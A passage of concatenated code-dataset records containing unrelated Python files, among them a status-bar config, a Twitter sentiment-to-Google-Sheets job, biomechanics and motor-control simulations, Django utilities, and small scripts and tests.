'VolumeStatus', 
'Networking', 'CPULoad']\n\nfont1 = 'Droid Sans Mono:size=18'\nfont2 = 'FontAwesome:size=22:charwidth=40'\nfont3 = 'Fontello:size=24:charwidth=40'\n#\n# font2 = 'FontAwesome:size=22:charwidth=40'\n# font3 = 'Fontello:size=24:charwidth=40'\n\ngeometry = 'x50+0+0'\nuoline_height = '4'\n\ngrey1 = '#FF1D1F21'\ngrey2 = '#FF282A2E'\ngrey3 = '#FF454A4F'\ngrey4 = '#FF89984'\nlight_grey = '#FFC5C8C6'\nx = '#FF454A4F'\ndark_green = '#FF8C9440'\nlight_green = '#FFB5BD68'\ndark_red = '#FFCC241D'\nlight_red = '#FFFB4934'\ndark_yellow = '#FFD79921'\nlight_yellow = '#FFFABD2F'\ndark_blue = '#FF458588'\nlight_blue = '#FF83A598'\n\nbg1 = grey1\nbg2 = grey2\nbg3 = grey3\nbg4 = light_grey\nbg5 = dark_green\nbg6 = light_green\nbg7 = dark_red\nbg8 = light_red\nbg9 = dark_yellow\nbg10 = light_yellow\nbg11 = dark_blue\nbg12 = light_blue\n\nfg1 = grey1\nfg2 = grey2\nfg3 = grey3\nfg4 = light_grey\nfg5 = dark_green\nfg6 = light_green\nfg7 = dark_red\nfg8 = light_red\nfg9 = dark_yellow\nfg10 = light_yellow\nfg11 = dark_blue\nfg12 = light_blue\n\ni3workspace_format = '%{T3}%s'\ni3workspace_format_focused = '%[bg6]%[fg1]%%{+u} %s %%{-u}'\ni3workspace_format_urgent = '%[bg9]%[fg1] %s '\ni3workspace_format_default = '%[fg1]%[bg5] %s '\ni3windowtitle_format = '%[fg4]%[bg1] %s '\ni3windowtitle_max_length = 80\n\nbspwmworkspace_format = '%{T3}%s'\nbspwmworkspace_format_focused = '%[bg6]%[fg1]%%{+u} %s %%{-u}'\nbspwmworkspace_format_urgent = '%[bg9]%[fg1] %s '\nbspwmworkspace_format_active = '%[fg1]%[bg5] %s '\nbspwmworkspace_format_inactive = '%[fg4]%[bg2] %s '\nbspwmworkspace_show_inactive = False\nbspwmworkspace_names = ['1 ', '2 ', '3 ', '4 ', '5 ',\n '6 ', '7 ', '8 ', '9 ', '0 ']\n\n\nbspwmwindowtitle_format = '%[fg4]%[bg1] %s '\nbspwmwindowtitle_max_length = 80\n\n\ncpuload_format = '%[bg1]%[fg6]%[fg4]%5s '\ncpuload_action1 = 'urxvt -geometry 200x60 -name htop -e htop'\n\nnetworking_format = '%[bg1]%[fg12] %[icon] %s'\nnetworking_icons_wireless = ['']\nnetworking_icons_wired = ['\\ue818']\nnetworking_action1 = 'nm-connection-editor'\n\nbattery_format = '%[bg1]%[icon_color] %[icon] %[fg4]%-3s '\nbattery_icons = ['', '', '', '', '']\nbattery_icon_colors = ['%[fg7]', '%[fg9]', '%[fg12]', '%[fg5]']\nbattery_action1 = 'xfce4-power-manager-settings'\n\nvolumestatus_format = '%[bg1]%[fg12] %[icon]%[fg4]%-3s '\nvolumestatus_icons = ['\\uf026', '\\uf027', '\\uf028']\nvolumestatus_action1 = 'pavucontrol'\nvolumestatus_action2 = 'pulse.py mute-toggle'\nvolumestatus_action4 = 'pulse.py +'\nvolumestatus_action5 = 'pulse.py -'\n\ndate_format = '%[fg1]%[bg5] %s'\ntime_format = ' %s '\n","sub_path":"lemonbar/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604441884","text":"'''\nMake some simple test data for looking at the \nvarious transformations used to make more \ncomplex test data and the phaser-ng system \nitself.\n\n@author: Simon Wilshin\n@contact: swilshin@rvc.ac.uk\n@date: Mar 2013\n'''\n\nfrom numpy import arange,cos,sin,array\nfrom numpy.random import randn\n\ndef simpleTestData(s0=0.05, w0=0.05, N=10000,D=2,T=[0.0,0.0]):\n assert D>1, \"Cant make test data less than 2D in this way\"\n y = s0*randn(D,N)\n y = array([(1+y[0])*cos(w0*arange(y.shape[1])+y[1]),(1+y[0])*sin(w0*arange(y.shape[1])+y[1])]).T+T\n 
return(y)\n","sub_path":"formphase/phaserngutil/simpletestdata.py","file_name":"simpletestdata.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61201615","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport time\nfrom datetime import timedelta, datetime\n\nfrom textblob import TextBlob\nfrom tqdm import tqdm\n\nimport pygsheets\nimport tweepy\n\n\nclass Deployment:\n\n def __init__(self, base_directory, context):\n\n # Load in the twitter secrets and tokens from the environment variables\n self.consumer_key = os.environ['CONSUMER_KEY']\n self.consumer_secret = os.environ['CONSUMER_SECRET']\n self.access_token = os.environ['ACCESS_TOKEN']\n self.access_token_secret = os.environ['ACCESS_TOKEN_SECRET']\n\n # Set up the connection to twitter\n self.twitter_api = self.setup_twitter()\n\n # Setup the connection to Google, using the environment variable for the GOOGLE_CREDENTIALS\n # This method assumes you have an environment variable loaded with the content of the service account\n # credentials json\n self.google_sheet = pygsheets.authorize(service_account_env_var='GOOGLE_CREDENTIALS')\n\n # Set the spreadsheet_id from the environment variables\n self.spreadsheet_id = os.environ['SPREADSHEET_ID']\n\n # Set the day of today\n self.today = datetime.today()\n\n def setup_twitter(self):\n \"\"\"\n Use the Tweepy package to connect to the twitter API and return the connection object\n \"\"\"\n\n auth = tweepy.OAuthHandler(self.consumer_key, self.consumer_secret)\n auth.set_access_token(self.access_token, self.access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True, retry_count=2, retry_delay=240, timeout=120)\n\n try:\n api.verify_credentials()\n print(\"Authentication Twitter OK\")\n except tweepy.error.TweepError as e:\n print(f\"Error during authentication: {e}\")\n raise e\n\n return api\n\n def request(self, data):\n \"\"\"\n Make the request by first collecting the tweets and sentiments of a day and a certain hashtag and then\n inserting them in a Google sheet\n \"\"\"\n\n hashtag = data.get('hashtag', 'MlOps') # If no hashtag is given, use MlOps\n day = data.get('day', 'yesterday') # If no day is given, use 'yesterday'\n\n # Parse the user inputted day and retrieve the end date of the query ('until')\n day, until = self.parse_date(day=day)\n\n # Retrieve tweets from 'day' to 'until'\n texts = self.retrieve_tweets(hashtag=hashtag, day=day, until=until)\n\n # Determine the sentiment over the recovered tweets\n results = self.get_sentiment(texts=texts, day=day)\n\n # Append the values to the specified Google Sheet\n sheet = self.google_sheet.open_by_key(key=self.spreadsheet_id)\n # Open first worksheet of spreadsheet\n wk1 = sheet[0]\n # Values will be appended after the last non-filled row of the table without overwriting\n wk1.append_table(values=results, overwrite=False)\n\n return None\n\n def parse_date(self, day):\n \"\"\"\n Parse the user inputted date to be of yyyy-mm-dd and return the day and until date\n \"\"\"\n\n date_format = \"%Y-%m-%d\"\n\n if day == \"yesterday\":\n # Convert the day and until date to the correct string format\n day = (self.today - timedelta(days=1)).strftime(date_format)\n until = self.today.strftime(date_format)\n\n else:\n # Check if the given date is in the correct format and not longer than 7 days ago\n try:\n day = datetime.strptime(day, date_format)\n if day < (self.today - timedelta(days=8)):\n raise ValueError\n except 
ValueError:\n                raise Exception(\n                    f\"Input for day is incorrect, it should be in the format of yyyy-mm-dd and should be no longer \"\n                    f\"than 7 days ago\")\n\n            # Convert the day and until date to the correct string format\n            until = (day + timedelta(days=1)).strftime(date_format)\n            day = day.strftime(date_format)\n\n        return day, until\n\n    def retrieve_tweets(self, hashtag, day, until):\n        \"\"\"\n        Return the tweet texts with the hashtag 'hashtag' that were created in one day\n        \"\"\"\n\n        texts = []\n        print(f\"Retrieving tweets between {day} and {until}\")\n\n        retry = 0\n        done = False\n\n        # Query the Twitter api for all tweets on the specified hashtag and day and add them to a list\n        while not done:\n            try:\n                for tweet in tqdm(tweepy.Cursor(\n                        self.twitter_api.search, q=hashtag, count=20, until=until, lang=\"en\", result_type=\"popular\"\n                ).items()):\n                    if tweet.created_at.strftime(\"%Y-%m-%d\") == day:\n                        texts.append(tweet.text)\n                done = True\n\n            except tweepy.error.TweepError as e:\n                # Retry after 60 seconds if the connection gets lost\n                print(f\"Something went wrong while querying for tweets: {e}\")\n                time.sleep(60)\n                retry += 1\n                if retry < 4:\n                    # Only make a maximum of 3 retry attempts\n                    print(f\"Retry attempt: {retry}\")\n                    continue\n                raise e\n\n        print(f\"{len(texts)} tweets retrieved\")\n        return texts\n\n    @staticmethod\n    def get_sentiment(texts, day):\n        \"\"\"\n        Perform sentiment analysis over all retrieved tweets and return the overall results\n        \"\"\"\n\n        print(\"Calculating sentiment\")\n\n        neutral_list = []\n        positive_list = []\n        negative_list = []\n\n        for tweet in tqdm(texts):\n            t = TextBlob(tweet).sentiment.polarity\n\n            if t > 0.1:\n                positive_list.append(t)\n            elif t < -0.1:\n                negative_list.append(t)\n            else:\n                neutral_list.append(t)\n\n        print(f\"Sentiment calculated over {len(texts)} tweets from day {day}\")\n\n        # Convert the day to the exact format necessary for the Tableau dashboard\n        day = datetime.strptime(day, \"%Y-%m-%d\").strftime(\"%d-%m-%Y\")\n        result = [day, len(positive_list), len(neutral_list), len(negative_list)]\n\n        print(f\"Result: {result}\")\n        return result\n","sub_path":"twitter-sentiment-analysis/twitter-sentiment-analysis/sentimentanalysis_deployment_package/deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"538879678","text":"import re\n# Formatter\n\n#from coding.settings_local import STATIC_URL\nfrom oaa_examples_django.settings import STATIC_URL\n\n\ndef OAAMarkupToHTML(str):\n    str1 = \"\"\n    \n    if str and len(str):\n        str = str.replace(\"%s\", \"must\")\n        \n        code = \"<code>\"\n        for c in str:\n            if c == '@':\n                str1 += code;\n                if code == \"<code>\":\n                    code = \"</code>\"\n                else:\n                    code = \"<code>\"\n            else:\n                str1 += c \n    return str1\n\ndef OAAMarkupToText(str):\n    str1 = \"\"\n\n    if str and len(str):\n        str = str.replace(\"%s\", \"must\")\n    \n        for c in str:\n            if c != '@':\n                str1 += c \n    \n    return str1\n\n\n\ndef HTMLToSourceCodeFormat(text):\n    \"\"\"A filter to format the sample HTML for rendering the source code\"\"\"\n    try:\n        out = re.sub(r'&','&amp;', text)\n        out = re.sub(r'\\t', '&nbsp;&nbsp;', out)\n        out = re.sub(r'<', '&lt;', out)\n        out = re.sub(r'>', '&gt;', out)\n        out = re.sub(r'&lt;HL1&gt;', '', out)\n        out = re.sub(r'&lt;/HL1&gt;', '', out)\n        out = re.sub(r'&lt;HL2&gt;', '', out)\n        out = re.sub(r'&lt;/HL2&gt;', '', out)\n        out = re.sub(r'\\n', '<br/>
\\n', out)\n out = re.sub(r' ', '  ', out)\n out = re.sub(r'{{EXAMPLE_MEDIA}}', STATIC_URL + 'examples/', out)\n return out\n except (TypeError, NameError, AttributeError):\n return ''\n\n\ndef OAAMarkupRemoveHighlightCode(text):\n\n \"\"\"Remove tags for highlighting for rendering the code as HTML.\"\"\"\n\n try:\n out = re.sub(r'', '', text)\n out = re.sub(r'', '', out)\n out = re.sub(r'', '', out)\n out = re.sub(r'', '', out)\n out = re.sub(r'{{EXAMPLE_MEDIA}}', STATIC_URL + 'examples/', out)\n return out\n except (TypeError, NameError, AttributeError):\n return ''\n\n ","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"446158615","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport math\n\nclass BodyPart:\n def __init__(self, length,mass, CoM, Inertia,distal,proximal,time):\n self.time=time\n self.sample=len(distal[0])\n self.length=length\n self.CoM=CoM\n self.mass=mass\n self.Inertia=Inertia\n self.distal=distal\n self.proximal=proximal\n self.ProximForce=[np.zeros(self.sample),np.zeros(self.sample)]\n self.ProximMoment=np.zeros(self.sample)\n self.angle = np.zeros(self.sample)\n self.omega=np.zeros(self.sample)\n self.alpha=np.zeros(self.sample)\n self.velProxim=[np.zeros(self.sample),np.zeros(self.sample)]\n self.accelProxim=[np.zeros(self.sample),np.zeros(self.sample)]\n self.accelCoM=[np.zeros(self.sample),np.zeros(self.sample)]\n def absangle(self):\n unfil=np.zeros(self.sample)\n for i in range(0,self.sample):\n unfil[i]=np.arctan2((self.proximal[1][i]-self.distal[1][i]),(self.proximal[0][i]-self.distal[0][i]))\n self.angle=filterdata(unfil,5)\n return self.angle\n\n def omega(self): #j1 is joint angle dataframe #n is number of datapoints\n unfil=np.zeros(self.sample)\n BodyPart.absangle(self)\n for i in range(1,self.sample-1):\n unfil[i] = (self.angle[i+1]-self.angle[i-1])/(self.time[i+1]-self.time[i-1])\n self.omega=filterdata(unfil,5)\n return self.omega\n\n def alpha(self): #j1 is joint angle dataframe #n is number of datapoints \n BodyPart.omega(self)\n unfil=np.zeros(self.sample)\n for i in range(1,self.sample-1):\n unfil[i] = (self.omega[i+1]-self.omega[i-1])/(self.time[i+1]-self.time[i-1])\n self.alpha=filterdata(unfil,5)\n return self.alpha\n\n def velProxim(self): #j1 is joint angle dataframe #n is number of datapoints \n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in range(1,self.sample-1):\n unfil[0][i] = (self.proximal[0][i+1]-self.proximal[0][i-1])/(self.time[i+1]-self.time[i-1])\n unfil[1][i] = (self.proximal[1][i+1]-self.proximal[1][i-1])/(self.time[i+1]-self.time[i-1])\n self.velProxim[0]=filterdata(unfil[0],5)/1000\n self.velProxim[1]=filterdata(unfil[1],5)/1000\n return self.velProxim\n \n def accelProxim(self): #j1 is joint angle dataframe #n is number of datapoin\n BodyPart.velProxim(self)\n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in range(1,self.sample-1):\n unfil[0][i] = (self.velProxim[0][i+1]-self.velProxim[0][i-1])/(self.time[i+1]-self.time[i-1])\n unfil[1][i] = (self.velProxim[1][i+1]-self.velProxim[1][i-1])/(self.time[i+1]-self.time[i-1])\n self.accelProxim[0]=filterdata(unfil[0],5)\n self.accelProxim[1]=filterdata(unfil[1],5)\n return self.accelProxim\n \n def accelCoM(self):\n r=self.length-self.CoM\n BodyPart.accelProxim(self)\n BodyPart.alpha(self)\n unfil=[np.zeros(self.sample),np.zeros(self.sample)]\n for i in 
range(1,self.sample):\n            unfil[0][i]=self.accelProxim[0][i]-(r*self.alpha[i]*math.sin(self.angle[i])+self.omega[i]*self.omega[i]*r*math.cos(self.angle[i]))\n            unfil[1][i]=self.accelProxim[1][i]+r*self.alpha[i]*math.cos(self.angle[i])-self.omega[i]*self.omega[i]*r*math.sin(self.angle[i])\n        self.accelCoM[0]=filterdata(unfil[0],5)\n        self.accelCoM[1]=filterdata(unfil[1],5)\n        return self.accelCoM \n\n    def Forces(self,R,M):\n        BodyPart.accelCoM(self)\n        for i in range(1,self.sample):\n            self.ProximForce[0][i]=R[0][i]+self.mass*self.accelCoM[0][i];\n            self.ProximForce[1][i]=R[1][i]+self.mass*self.accelCoM[1][i]+self.mass*9.81;\n            self.ProximMoment[i]=M[i]+R[0][i]*self.length*math.sin(self.angle[i])-R[1][i]*self.length*math.cos(self.angle[i])-self.mass*9.81*self.CoM*math.cos(self.angle[i])+(self.Inertia+self.mass*self.CoM*self.CoM)*self.alpha[i];\n        return self.ProximForce,self.ProximMoment\n    \ndef Power(omega1,omega2,M):\n    Jw=omega2-omega1\n    power=np.multiply(Jw,M)\n    return power\n    \n    \ndef filterdata(y,n):\n    from scipy.signal import filtfilt\n    b = [1.0 / n] * n\n    a = 1\n    yy = filtfilt(b,a,y)\n    return yy;\n\ndef AnthroData(weight,height):\n    data=np.zeros(19)\n    misc= (7.8*9.6*9.6*49.5)+(46.84*31.6*31.6*50.3)+2*(2.7*16.4*16.4*32.3)+2*(2.7*13.7*13.7*30.3)+2*(0.6*8.2*8.2*29.7) #sum of Icm of all the upper body parts\n    data[0]= weight*68.2/100 #weight of UB\n    data[1]= height*14.2/100 #height of com of UB from hip \n    data[2]= data[0]*data[1]*data[1]+misc #moment for UB\n    data[3]= weight*9.9/100#weight of thigh\n    data[4]= height*25.4/100#height of thigh\n    data[5]= data[4]*43.3/100#height of com thigh\n    data[6]= data[3]*data[4]*data[4]*32.3/100#moment of thigh\n    data[7]= weight*4.6/100#weight of shank\n    data[8]= height*23.3/100#height of shank\n    data[9]= data[8]*43/100 #height of com shank\n    data[10]= data[7]*data[8]*data[8]*30.2/100 #moment of shank\n    data[11]= weight*(1.4-0.361)/100#weight of foot\n    data[12]= height*(11.7-3.53)/100 #height of foot\n    data[13]= data[12]*50/100 #height of com foot\n    data[14]= data[11]*data[12]*data[12]*47.5/100 #moment of foot\n    data[15]=weight*.361/100 #weight of toe\n    data[16]=height*3.53/100 #height of toe\n    data[17]=data[16]/2 #height of com of toe\n    data[18]=data[15]*data[16]*data[16]/12 #moment of toe\n    return data","sub_path":"limb.py","file_name":"limb.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"12395018","text":"from django.db import models\r\nfrom uuid import uuid4\r\nfrom .persona import Persona\r\nfrom tools.base import CreatedModifiedModel\r\n\r\n\r\nclass Capacitacion(CreatedModifiedModel):\r\n    \"\"\"\r\n    Describes an authorization to use a class of machine in the\r\n    lab.
A person can have multiple trainings.\r\n    The relation to the trainer is optional, since that information is not\r\n    available for all trainings.\r\n    \"\"\"\r\n\r\n    id = models.UUIDField(primary_key=True, default=uuid4, editable=False)\r\n    persona = models.ForeignKey(\r\n        Persona,\r\n        related_name='capacitaciones',\r\n        on_delete=models.CASCADE,\r\n        help_text='el perfil de la persona capacitada'\r\n    )\r\n\r\n    capacitador = models.ForeignKey(\r\n        Persona,\r\n        related_name='capacitador_de',\r\n        on_delete=models.SET_NULL,\r\n        null=True,\r\n        blank=True,\r\n        help_text='la persona que realizó la capacitación'\r\n    )\r\n\r\n    clase_maquina = models.ForeignKey(\r\n        'maquinas.ClaseMaquina',\r\n        verbose_name='clase de máquina',\r\n        related_name='capacitaciones',\r\n        on_delete=models.CASCADE,\r\n        help_text='la clase de equipamiento sobre la que se capacitó'\r\n    )\r\n\r\n    fecha = models.DateField(\r\n        help_text=('la fecha en que se realizó. en caso de que haya durado más '\r\n                   'de una sesión, la fecha de la sesión final')\r\n    )\r\n\r\n    class Meta:\r\n        verbose_name = 'capacitación'\r\n        verbose_name_plural = 'capacitaciones'\r\n","sub_path":"perfiles/models/capacitacion.py","file_name":"capacitacion.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328390644","text":"#!/usr/bin/python\n# coding: utf-8\n\n# Author: LE YUAN\n# Date: 2020-08-10\n\n\nimport os\nimport csv\nimport json\n\noutfile = open(\"./substrate_results.tsv\", \"wt\")\ntsv_writer = csv.writer(outfile, delimiter=\"\\t\")\ntsv_writer.writerow(['species', 'expansion', 'contraction', 'rapidly_evolving'])\n\n\nwith open(\"./summary_run_pub.txt\", \"r\") as file :\n    lines = file.readlines()[1:]\n\nfor line in lines :\n    data = line.strip().split('\\t')\n    # print(data)\n    species = data[0].replace('&', '_')\n    expansion = data[1].split(' (')[0]\n    contraction = data[4].split(' (')[0]\n    rapidly_evolving = data[1].split(' (')[1][:-1]\n    # print(expansion)\n    # print(contraction)\n    # print(rapidly_evolving)\n    tsv_writer.writerow([species,expansion,contraction,rapidly_evolving])\n\noutfile.close()","sub_path":"evolution_analysis/code/gene_expansion_contraction/code/analyze_substrate/substrate_analysis.py","file_name":"substrate_analysis.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"141734718","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2022/9/17 22:14\r\n# File: 1624.py\r\n# Desc: \r\n\r\nclass Solution:\r\n    def maxLengthBetweenEqualCharacters(self, s: str) -> int:\r\n        ma = -1\r\n        for idx in range(len(s)):\r\n            ma = max(s.rfind(s[idx]) - idx, ma)\r\n        return ma-1\r\n","sub_path":"Solutions/1624/1624.py","file_name":"1624.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"328781361","text":"import sys\nsys.path.append('../')\n\nimport numpy as np\nfrom simulation.simulation import *\n\ndef IPMSM_positioning(simulation_time, plant_parameters, control_parameters, external_inputs):\n\n    # state parameters and data for plot\n    id_data=[]\n    iq_data=[]\n    qm_data=[]\n    dqm_data=[]\n    qm_cmd_data=[]\n    dqm_cmd_data=[]\n    dqm_ref_data=[]\n    id_cmd_data=[]\n    iq_ref_data=[]\n    qm_err_data=[]\n    dqm_err_data=[]\n    id_err_data=[]\n    iq_err_data=[]\n    time_data=[]\n\n    sampling_time=plant_parameters[0]\n    J=plant_parameters[1]\n    B=plant_parameters[2]\n    
R=plant_parameters[3]\n Ld=plant_parameters[4]\n Lq=plant_parameters[5]\n Ke=plant_parameters[6]\n P=plant_parameters[7]\n\n Kpp = control_parameters[0]\n Kpv = control_parameters[1]\n Kiv = control_parameters[2]\n Kpi = control_parameters[3]\n Kii = control_parameters[4]\n\n qm_cmd = external_inputs[0]\n dqm_cmd = external_inputs[1]\n torque_reac = external_inputs[2]\n\n # simulation object\n sim_env = SimulationEnvironment(sampling_time = sampling_time)\n IPMSM_motor = IPMSM(Ld=Ld, Lq=Lq, Ke=Ke, R=R, P=P, sampling_time=sim_env.sampling_time, control_sampling_time=sampling_time)\n rigid_rotor = RigidRotor(J=J, B=B, sampling_time = sim_env.sampling_time, control_sampling_time=sampling_time)\n\n # main loop 10[sec]\n for i in range(int(simulation_time*(1/sim_env.sampling_time))):\n time = i * sim_env.sampling_time\n\n control_delay = (int)(IPMSM_motor.control_sampling_time/sim_env.sampling_time) #[sample]\n if i%control_delay == 0:\n \"\"\" controller \"\"\"\n # definition for control parameters\n if i == 0 :\n id_err_int = 0.0\n iq_err_int = 0.0\n\n # position controller (P position feedback control)\n qm_err = qm_cmd[i] - rigid_rotor.xvec[0]\n dqm_ref = Kpp * qm_err\n\n # velocity controller (P velocity feedback control)\n dqm_err = dqm_ref - rigid_rotor.xvec[1]\n iq_ref = Kpv * dqm_err # + dqm_cmd[i]\n\n # current controller (PI current feedback control)\n # d current control: Id = 0\n id_cmd = 0.0\n id_err = id_cmd - IPMSM_motor.xvec[0]\n id_err_int = id_err_int + id_err * IPMSM_motor.control_sampling_time\n vd = Kpi * id_err + Kii * id_err_int\n # q current control\n iq_err = iq_ref - IPMSM_motor.xvec[1]\n iq_err_int = iq_err_int + iq_err * IPMSM_motor.control_sampling_time\n vq = Kpi * iq_err + Kii * iq_err_int\n\n #data update\n time_data.append(time)\n id_data.append(IPMSM_motor.xvec[0])\n iq_data.append(IPMSM_motor.xvec[1])\n qm_data.append(rigid_rotor.xvec[0])\n dqm_data.append(rigid_rotor.xvec[1])\n qm_cmd_data.append(qm_cmd[i])\n dqm_cmd_data.append(dqm_cmd[i])\n dqm_ref_data.append(dqm_ref)\n id_cmd_data.append(id_cmd)\n iq_ref_data.append(iq_ref)\n qm_err_data.append(qm_err)\n dqm_err_data.append(dqm_err)\n id_err_data.append(id_err)\n iq_err_data.append(iq_err)\n\n \"\"\" controller end \"\"\"\n\n \"\"\" plant \"\"\"\n\n # derivative calculation\n rigid_rotor.dxvec = rigid_rotor.calc_deri(IPMSM_motor.torque, torque_reac[i])\n IPMSM_motor.dxvec = IPMSM_motor.calc_deri(vd, vq, rigid_rotor.xvec[1])\n # euler-integration\n rigid_rotor.update()\n IPMSM_motor.update()\n\n \"\"\" plant end \"\"\"\n\n # data plot\n from matplotlib import pyplot as plt\n plt.figure(figsize=(10, 7))\n plt.subplot(421)\n plt.plot(time_data, qm_cmd_data, label=\"theta motor cmd\")\n plt.plot(time_data, qm_data, label=\"theta motor res\")\n plt.legend()\n plt.grid()\n plt.ylabel('theta [rad]')\n\n plt.subplot(423)\n plt.plot(time_data, dqm_ref_data, label=\"omega motor cmd\")\n plt.plot(time_data, dqm_data, label=\"omega motor res\")\n plt.legend()\n plt.grid()\n plt.ylabel('omega [rad/s]')\n\n plt.subplot(425)\n plt.plot(time_data, id_cmd_data, label=\"id cmd\")\n plt.plot(time_data, id_data, label=\"id res\")\n plt.legend()\n plt.grid()\n plt.ylabel('current [A]')\n\n plt.subplot(427)\n plt.plot(time_data, iq_ref_data, label=\"iq cmd\")\n plt.plot(time_data, iq_data, label=\"iq res\")\n plt.legend()\n plt.grid()\n plt.ylabel('current [A]')\n\n plt.subplot(422)\n plt.plot(time_data, qm_err_data, label=\"theta error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(424)\n plt.plot(time_data, dqm_err_data, 
label=\"omega error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(426)\n plt.plot(time_data, id_err_data, label=\"id error\")\n plt.legend()\n plt.grid()\n\n plt.subplot(428)\n plt.plot(time_data, iq_err_data, label=\"iq error\")\n plt.legend()\n plt.grid()\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n\n simulation_time = 3.0\n sampling_time = 0.0001 # 100 us\n\n #################################################################\n ### example 2 IPMSM positioning\n #################################################################\n Ld=3.9*0.001\n Lq=7.9*0.001\n Ke=47.21*0.001\n R=154.9*0.001\n P=3\n J=0.1\n B=0.001\n plant_parameters = [sampling_time, J, B, R, Ld, Lq, Ke, P]\n\n # Command\n qm_cmd = []\n dqm_cmd = []\n for i in range(int(simulation_time/sampling_time)):\n time = i * sampling_time\n if time <= 0.5:\n qm_cmd_tmp = 0.0\n dqm_cmd_tmp = 0.0\n else:\n qm_cmd_tmp = 1.0\n dqm_cmd_tmp = 0.0\n qm_cmd.append(qm_cmd_tmp)\n dqm_cmd.append(dqm_cmd_tmp)\n\n # Disturbance\n torque_reac = []\n for i in range(int(simulation_time/sampling_time)):\n time = i * sampling_time\n torque_reac_tmp = 0.0\n torque_reac.append(torque_reac_tmp)\n\n external_inputs = [qm_cmd, dqm_cmd, torque_reac]\n\n # Position gains\n Kpp = 2.0 # P gain for velocity control loop\n Kpv = 10.0 # P gain for velocity control loop\n Kiv = 0.5 # I gain for velocity control loop\n Kpi = 5.0 # P gain for current control loop\n Kii = 1.5 # I gain for current control loop\n control_parameters = [Kpp, Kpv, Kiv, Kpi, Kii]\n\n # Simulation\n IPMSM_positioning(simulation_time, plant_parameters, control_parameters, external_inputs)\n","sub_path":"examples/example_ipmsm_positioning.py","file_name":"example_ipmsm_positioning.py","file_ext":"py","file_size_in_byte":6507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"341367867","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 9 20:11:18 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def moveZeroes(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: None Do not return anything, modify nums in-place instead.\r\n \"\"\"\r\n l = len(nums)\r\n \r\n for i in range(0,l,1):\r\n while nums[i]==0:\r\n if nums[i+1:] == [0]*(l-i-1):\r\n break\r\n nums[i:-1] = nums[i+1:]\r\n nums[-1] = 0\r\n \r\n return nums","sub_path":"Leetcode/#283 Move Zeroes.py","file_name":"#283 Move Zeroes.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"409588639","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2016-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree. 
An additional grant\n# of patent rights can be found in the PATENTS file in the same directory.\n\nimport os\nimport stat\n\nimport hypothesis\nfrom eden.test_support.hypothesis import FILENAME_STRATEGY\n\nfrom .lib import testcase\n\n\n@testcase.eden_repo_test\nclass HypothesisSimpleTest(testcase.EdenRepoTest):\n    def populate_repo(self) -> None:\n        self.repo.write_file(\"hello\", \"hola\\n\")\n        self.repo.write_file(\"adir/file\", \"foo!\\n\")\n        self.repo.write_file(\"bdir/test.sh\", \"#!/bin/bash\\necho test\\n\", mode=0o755)\n        self.repo.write_file(\"bdir/noexec.sh\", \"#!/bin/bash\\necho test\\n\")\n        self.repo.symlink(\"slink\", \"hello\")\n        self.repo.commit(\"Initial commit.\")\n\n    @hypothesis.given(FILENAME_STRATEGY)\n    def test_create(self, basename: str) -> None:\n        filename = os.path.join(self.mount, basename)\n\n        # Ensure that we don't proceed if hypothesis has selected a name that\n        # conflicts with the names we generated in the repo.\n        hypothesis.assume(not os.path.exists(filename))\n\n        with open(filename, \"w\") as f:\n            f.write(\"created\\n\")\n\n        entries = sorted(os.listdir(self.mount))\n        self.assertEqual(\n            sorted([\".eden\", \"adir\", \"bdir\", \"hello\", basename, \"slink\"]), entries\n        )\n\n        with open(filename, \"r\") as f:\n            self.assertEqual(f.read(), \"created\\n\")\n\n        st = os.lstat(filename)\n        self.assertEqual(st.st_size, 8)\n        self.assertTrue(stat.S_ISREG(st.st_mode))\n","sub_path":"eden/integration/hypothesis_simple_test.py","file_name":"hypothesis_simple_test.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368347082","text":"import csv \nimport numpy as np\nfrom numpy.linalg import inv\nimport random\nimport math\nimport sys\nimport matplotlib.pyplot as plt\n\n#feature scaling\n#adagrad\n#N-fold cross validation\n#batch\n\ndata = []\nhour = 9\nlambda_w = 0.0001\n\nfor i in range(18):\n    